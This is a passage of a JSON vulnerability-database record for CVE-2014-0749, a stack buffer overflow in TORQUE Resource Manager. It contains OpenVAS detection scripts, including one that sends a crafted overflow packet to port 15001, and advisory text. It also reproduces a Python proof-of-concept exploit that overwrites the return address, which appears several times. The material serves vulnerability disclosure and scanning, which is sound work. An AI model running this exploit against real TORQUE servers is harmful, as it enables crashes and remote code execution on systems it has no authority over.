isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-07-21T21:59:22", "description": "This host is running TORQUE Resource Manager and is prone to stack buffer\n overflow vulnerability.", "cvss3": {}, "published": "2014-05-29T00:00:00", "type": "openvas", "title": "TORQUE Resource Manager Stack Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2020-07-16T00:00:00", "id": "OPENVAS:1361412562310804456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# TORQUE Resource Manager Stack Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804456\");\n script_version(\"2020-07-16T08:52:35+0000\");\n script_cve_id(\"CVE-2014-0749\");\n script_bugtraq_id(67420);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 08:52:35 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-05-29 14:39:49 +0530 (Thu, 29 May 2014)\");\n script_name(\"TORQUE Resource Manager Stack Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"find_service.nasl\");\n script_require_ports(15001);\n\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2014/May/75\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/126651\");\n script_xref(name:\"URL\", value:\"https://labs.mwrinfosecurity.com/advisories/2014/05/14/torque-buffer-overflow/\");\n\n script_tag(name:\"summary\", value:\"This host is running TORQUE Resource Manager and is prone to stack buffer\n overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send crafted request and check is it vulnerable to DoS or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error within the 'disrsi_()' function\n (src/lib/Libdis/disrsi_.c), which can be exploited to cause a stack-based buffer overflow.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker to execute 
arbitrary code\n and cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"TORQUE versions 2.5 through 2.5.13.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to TORQUE 4.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nport = 15001;\nif(!get_port_state(port))\n exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nsend(socket:soc, data:\"--help\");\nres = recv(socket:soc, length:1024);\nclose(soc);\n\nif(!res || \"DIS based Request Protocol MSG=cannot decode message\" >!< res)\n exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nBadData = raw_string(0x33, 0x31, 0x34, 0x33, 0x31) +\n crap(data: raw_string(0x00), length: 135) +\n raw_string(0xc0, 0x18, 0x76, 0xf7, 0xff,\n 0x7f, 0x00, 0x00);\nsend(socket:soc, data:BadData);\nclose(soc);\n\nsleep(1);\n\nsoc = open_sock_tcp(port);\nif(!soc) {\n security_message(port:port);\n exit(0);\n}\n\nclose(soc);\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:13", "description": "John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.", "cvss3": {}, "published": "2014-05-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2936-1 (torque - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310702936", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702936", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2936.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2936-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# 
Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702936\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0749\");\n script_name(\"Debian Security Advisory DSA 2936-1 (torque - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-23 00:00:00 +0200 (Fri, 23 May 2014)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2936.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"torque on Debian Linux\");\n script_tag(name:\"solution\", 
value:\"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\");\n script_tag(name:\"summary\", value:\"John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.16+dfsg-1+deb7u3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:08", "description": "Gentoo Linux Local Security Checks GLSA 201412-47", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201412-47", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4925", "CVE-2013-4319", "CVE-2011-2907", "CVE-2013-4495", "CVE-2014-0749", "CVE-2011-2193"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121333", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121333", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n# $Id: glsa-201412-47.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121333\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:24 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201412-47\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in TORQUE Resource Manager. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201412-47\");\n script_cve_id(\"CVE-2011-2193\", \"CVE-2011-2907\", \"CVE-2011-4925\", \"CVE-2013-4319\", \"CVE-2013-4495\", \"CVE-2014-0749\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201412-47\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"sys-cluster/torque\", unaffected: make_list(\"ge 4.1.7\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"sys-cluster/torque\", unaffected: make_list(\"ge 2.5.13\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"sys-cluster/torque\", unaffected: make_list(), vulnerable: make_list(\"lt 4.1.7\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:18:52", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0749"], "modified": 
"2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86762", "id": "SSV:86762", "sourceData": "\n #!/usr/bin/env python\r\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\r\n# Date: 27 May 2014\r\n# Exploit Author: bwall - @botnet_hunter\r\n# Vulnerability discovered by: MWR Labs\r\n# CVE: CVE-2014-0749\r\n# Vendor Homepage: http://www.adaptivecomputing.com/\r\n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/\r\n# Version: 2.5.13\r\n# Tested on: Manjaro x64\r\n# Description:\r\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\r\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\r\n# data, the next digits are the actual size of the buffer.\r\n#\r\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\r\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\r\n# compiled on the target system. 
The result of this exploit is intended to just point RIP at 'exit()'\r\n\r\nimport socket\r\n\r\n\r\nip = "172.16.246.177"\r\nport = 15001\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((ip, port))\r\n\r\noffset = 143\r\nheader = str(len(str(offset))) + str(offset) + '1'\r\n\r\npacket = header\r\npacket += "\\x00" * (140 - len(packet))\r\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\r\n\r\ns.sendall(packet)\r\ndata = s.recv(1024)\r\ns.close()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86762"}], "ubuntucve": [{"lastseen": "2023-09-21T06:47:32", "description": "Stack-based buffer overflow in lib/Libdis/disrsi_.c in Terascale\nOpen-Source Resource and Queue Manager (aka TORQUE Resource Manager) 2.5.x\nthrough 2.5.13 allows remote attackers to execute arbitrary code via a\nlarge count value.", "cvss3": {}, "published": "2014-05-16T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0749", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-16T00:00:00", "id": "UB:CVE-2014-0749", "href": "https://ubuntu.com/security/CVE-2014-0749", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:28:50", "description": "\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch 
processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\n\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\n\nWe recommend that you upgrade your torque packages.\n\n\n", "cvss3": {}, "published": "2014-05-23T00:00:00", "type": "osv", "title": "torque - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2022-07-21T05:48:17", "id": "OSV:DSA-2936-1", "href": "https://osv.dev/vulnerability/DSA-2936-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-03T03:40:45", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2014-06-01T00:00:00", "type": "zdt", "title": "TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-06-01T00:00:00", "id": "1337DAY-ID-22301", "href": "https://0day.today/exploit/description/22301", "sourceData": "#!/usr/bin/env python\r\n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub\r\n# Date: 27 May 2014\r\n# Exploit Author: bwall - @botnet_hunter\r\n# 
Vulnerability discovered by: MWR Labs\r\n# CVE: CVE-2014-0749\r\n# Vendor Homepage: http://www.adaptivecomputing.com/\r\n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/\r\n# Version: 2.5.13\r\n# Tested on: Manjaro x64\r\n# Description:\r\n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that\r\n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the\r\n# data, the next digits are the actual size of the buffer.\r\n#\r\n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system\r\n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be\r\n# compiled on the target system. The result of this exploit is intended to just point RIP at 'exit()'\r\n \r\nimport socket\r\n \r\n \r\nip = \"172.16.246.177\"\r\nport = 15001\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((ip, port))\r\n \r\noffset = 143\r\nheader = str(len(str(offset))) + str(offset) + '1'\r\n \r\npacket = header\r\npacket += \"\\x00\" * (140 - len(packet))\r\npacket += ('\\xc0\\x18\\x76\\xf7\\xff\\x7f\\x00\\x00') # exit() may require a different offset in your build\r\n \r\ns.sendall(packet)\r\ndata = s.recv(1024)\r\ns.close()\n\n# 0day.today [2018-03-03] #", "sourceHref": "https://0day.today/exploit/22301", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:13", "description": "", "cvss3": {}, "published": "2014-05-30T00:00:00", "type": "packetstorm", "title": "TORQUE Resource Manager 2.5.13 Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-30T00:00:00", "id": "PACKETSTORM:126855", "href": 
"https://packetstormsecurity.com/files/126855/TORQUE-Resource-Manager-2.5.13-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/env python \n# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub \n# Date: 27 May 2014 \n# Exploit Author: bwall - @botnet_hunter \n# Vulnerability discovered by: MWR Labs \n# CVE: CVE-2014-0749 \n# Vendor Homepage: http://www.adaptivecomputing.com/ \n# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/ \n# Version: 2.5.13 \n# Tested on: Manjaro x64 \n# Description: \n# A buffer overflow while parsing the DIS network communication protocol. It is triggered when requesting that \n# a larger amount of data than the small buffer be read. The first digit supplied is the number of digits in the \n# data, the next digits are the actual size of the buffer. \n# \n# This is an exploit stub, meant to be a quick proof of concept. This was built and tested for a 64 bit system \n# with ASLR disabled. Since Adaptive Computing does not supply binary distributions, TORQUE will likely be \n# compiled on the target system. 
